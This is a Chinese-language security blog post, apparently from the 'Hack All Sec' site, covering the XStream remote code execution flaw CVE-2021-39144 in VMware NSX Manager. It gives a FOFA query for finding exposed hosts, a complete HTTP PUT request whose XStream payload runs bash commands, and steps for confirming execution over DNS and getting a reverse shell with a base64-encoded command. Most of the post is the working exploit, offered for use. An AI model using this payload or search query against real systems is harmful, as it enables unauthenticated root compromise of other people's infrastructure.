VMware NSX Manager XStream 远程代码执行漏洞(CVE-2021-39144)


简介

由于在 VMware Cloud Foundation (NSX-V) 中使用 XStream 进行序列化而未经身份验证,黑客可以构造恶意数据包从而造成远程代码执行漏洞。VMware Cloud Foundation 3.x 和更具体的 NSX Manager Data Center for vSphere 6.4.13 及更高版本容易受到远程命令执行的攻击。利用该漏洞可获得 root 权限。

FoFa语法

title="VMware Appliance Management"

漏洞复现

访问VMware Appliance Management页面,如图:


使用下面Poc进行命令执行测试:

{cat_hide}

PUT /api/2.0/services/usermgmt/password/abc HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 546

<sorted-set>
        <string>foo</string>
        <dynamic-proxy>
          <interface>java.lang.Comparable</interface>
          <handler class="java.beans.EventHandler">
            <target class="java.lang.ProcessBuilder">
              <command>
                <string>bash</string>
                <string>-c</string>
                <string>cmd</string>
              </command>
            </target>
            <action>start</action>
          </handler>
        </dynamic-proxy>
      </sorted-set>

{/cat_hide}

使用DNS外带测试命令执行,返回400,如图:

查看DNS Log成功获取命令执行结果,如图:

继续探测web路径,尝试通过将命令执行结果写入静态文件,从而回显检测漏洞,如图:

但未获得全部web路径,仅获取到部分web路径:

本地搭建环境找到Web路径。通过写入静态页面检测漏洞是否存在。

GetShell

直接bash会因为特殊字符无法获得shell。通过base64编码一下即可反弹shell,如图:

Xray Poc

https://t.zsxq.com/08OAm0JQ9

声明:Hack All Sec的博客|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - VMware NSX Manager XStream 远程代码执行漏洞(CVE-2021-39144)


Hacker perspective for security